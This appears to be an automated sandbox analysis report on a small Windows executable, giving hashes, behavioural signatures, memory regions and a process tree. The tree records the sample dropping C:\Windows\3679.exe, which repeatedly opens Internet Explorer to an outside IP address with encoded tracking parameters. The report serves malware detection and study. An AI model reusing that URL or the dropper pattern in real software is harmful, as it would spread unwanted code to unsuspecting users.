Analysis

  • max time kernel
    94s
  • max time network
    95s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/09/2024, 03:56

General

  • Target

    f51faecef4676ac8b342144cc8e6219d_JaffaCakes118.exe

  • Size

    17KB

  • MD5

    f51faecef4676ac8b342144cc8e6219d

  • SHA1

    6fd7929033004c7005f04685a16414de54806997

  • SHA256

    e4bce97cae52c9cfc77cbe0ca24eb509080c31e2f49f76f7788b9344ac205d6f

  • SHA512

    114f4755562b4d89dddeeebdd4f29d440258d2b9ffb9097479ae857c78b0eb63659240142a2ee2092fe2717491b78a850e6e58f52ec2e66567059579e303b206

  • SSDEEP

    384:K84Wc753gHTSisRiK43LDI6sEKyePd1VONUiBk:QWc75JisHqLzsEKdn

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 49 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SetWindowsHookEx 18 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f51faecef4676ac8b342144cc8e6219d_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\f51faecef4676ac8b342144cc8e6219d_JaffaCakes118.exe"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1856
    • C:\Windows\3679.exe
      C:\Windows\3679.exe -r
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3972
      • C:\Program Files\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://122.102.6.88/down7/down/?s=C2AECCE3AFC3BBB7B89ACCA581B5E1BF&t=9/25/2024 3:56:20 AM&v=C1D3B8E3B1B191A0B3BEBCA0&n=C7AFD1B1B7B3AFCAB99BC0AD
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3936
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3936 CREDAT:17410 /prefetch:2
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:4976
      • C:\Program Files\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://122.102.6.88/down7/down/?s=C2AECCE3AFC3BBB7B89ACCA581B5E1BF&t=9/25/2024 3:56:38 AM&v=C1D3B8E3B1B191A0B3BEBCA0&n=C7AFD1B1B7B3AFCAB99BC0AD
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2024
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2024 CREDAT:17410 /prefetch:2
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:3980
      • C:\Program Files\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://122.102.6.88/down7/down/?s=C2AECCE3AFC3BBB7B89ACCA581B5E1BF&t=9/25/2024 3:56:48 AM&v=C1D3B8E3B1B191A0B3BEBCA0&n=C7AFD1B1B7B3AFCAB99BC0AD
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:5020
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5020 CREDAT:17410 /prefetch:2
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:968
      • C:\Program Files\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://122.102.6.88/down7/down/?s=C2AECCE3AFC3BBB7B89ACCA581B5E1BF&t=9/25/2024 3:56:58 AM&v=C1D3B8E3B1B191A0B3BEBCA0&n=C7AFD1B1B7B3AFCAB99BC0AD
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:888
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:888 CREDAT:17410 /prefetch:2
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:1236

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{1F41DD65-7AF2-11EF-818E-4E01FFCF908D}.dat

    Filesize

    5KB

    MD5

    6880c0552a2cb6f811ed34d313f84ffb

    SHA1

    c45604e04e2392fa4a67a2283ab6f4bc14f81718

    SHA256

    5acd736d5f31cbc527aa588a93165c2369ff263d500d8f28639e5aa78769c0b3

    SHA512

    48420fd1c25c292f474cff79f4485bb7f8f62e175453e9befe95d3228098f66a3eacc4d10a6ed87aa0b2825c89f89c548b44cbbd30df0af3c06969ed882d82d8

  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{29B28BE8-7AF2-11EF-818E-4E01FFCF908D}.dat

    Filesize

    5KB

    MD5

    16f078e4f29a8b332d07e28ec6c9f554

    SHA1

    f282ca42252f8887233023a1661d4bc1765d738f

    SHA256

    e29165c73305f95669c138e854fbebf8914b6b74383ff55d3fa8d028087e961e

    SHA512

    33e7134bd5c2d4025dc4b45294c334be65f995c4df4a39d25e387b0b32354e9ab8d3f9ec70abd09cbd3d802a17548681d7096ba715ad68d447429e336da7540b

  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{2FAD305F-7AF2-11EF-818E-4E01FFCF908D}.dat

    Filesize

    5KB

    MD5

    bd6a19fee31c321bb329dfa9e1cdabb8

    SHA1

    04cf690f9af1ccd89d1c70c02b7fbe739b5f0363

    SHA256

    3c4f2230b907535bbcc5d7432b4b645835b4403a0e6b2e7d4e0ad5295735b975

    SHA512

    97b09075f0b2f0f518ba7982a048a5663a5c29d6505e2279c7bff7c924a0bcd4f8ee8aba34672441e2bcbb8b1f98b74af1c29ce2bab23fadeaaac34ff21fba83

  • C:\Windows\3679.exe

    Filesize

    17KB

    MD5

    f51faecef4676ac8b342144cc8e6219d

    SHA1

    6fd7929033004c7005f04685a16414de54806997

    SHA256

    e4bce97cae52c9cfc77cbe0ca24eb509080c31e2f49f76f7788b9344ac205d6f

    SHA512

    114f4755562b4d89dddeeebdd4f29d440258d2b9ffb9097479ae857c78b0eb63659240142a2ee2092fe2717491b78a850e6e58f52ec2e66567059579e303b206

  • memory/1856-11-0x0000000000400000-0x000000000040D000-memory.dmp

    Filesize

    52KB

  • memory/1856-0-0x0000000000400000-0x000000000040D000-memory.dmp

    Filesize

    52KB

  • memory/1856-1-0x00000000001C0000-0x00000000001C2000-memory.dmp

    Filesize

    8KB

  • memory/3972-18-0x00000000001C0000-0x00000000001C2000-memory.dmp

    Filesize

    8KB

  • memory/3972-17-0x0000000000400000-0x000000000040D000-memory.dmp

    Filesize

    52KB

  • memory/3972-20-0x0000000000400000-0x000000000040D000-memory.dmp

    Filesize

    52KB

  • memory/3972-22-0x0000000000400000-0x000000000040D000-memory.dmp

    Filesize

    52KB

  • memory/3972-24-0x0000000000400000-0x000000000040D000-memory.dmp

    Filesize

    52KB

  • memory/3972-25-0x0000000000400000-0x000000000040D000-memory.dmp

    Filesize

    52KB